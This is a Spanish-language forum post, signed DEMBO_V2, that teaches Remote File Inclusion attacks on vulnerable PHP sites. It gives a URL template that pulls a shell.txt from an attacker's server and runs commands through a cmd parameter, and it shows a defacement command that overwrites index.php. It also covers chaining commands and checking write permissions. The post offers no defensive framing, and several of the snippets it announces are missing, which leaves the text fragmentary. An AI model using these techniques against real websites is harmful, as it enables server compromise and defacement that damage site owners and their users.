Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.
La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:
Para obtener la shell de la web solo necesitamos este codigo:
Cita:
|
http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.
|
Esa seria una web vulenerable.
Ejemplo:http//ww.rush.com/index.php?
Para poder hacer un ataque RFI tendremos que hacer esto:
Para saber si es vulnerable en el block de notas pegas esto
aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.
Oora procedemos a usar esto:
y listo asi explotaran el comando.
Un ejemplo de una shell explotada:
pwd—> nos muestra en que parte del servidor estamos por ejemplo:
Una Shell para sobreescribir un archivo es:
Cita:
|
/shell.txt?&cmd=Defaced By: Dembo_V2 >index.php.
|
Para ejecutar mas de un comando solo usen esto “;”
Cita:
|
/shell.txt?&cmd=[coamando];[Comando];[Comando]
|
Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando
Cita:
|
/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos
|
Para saber los datos de la DB usa este comando:
Es todo
Salu2.
DEMBO_V2
ataque RFI(Remote File Inclusion)
Mode Lineal
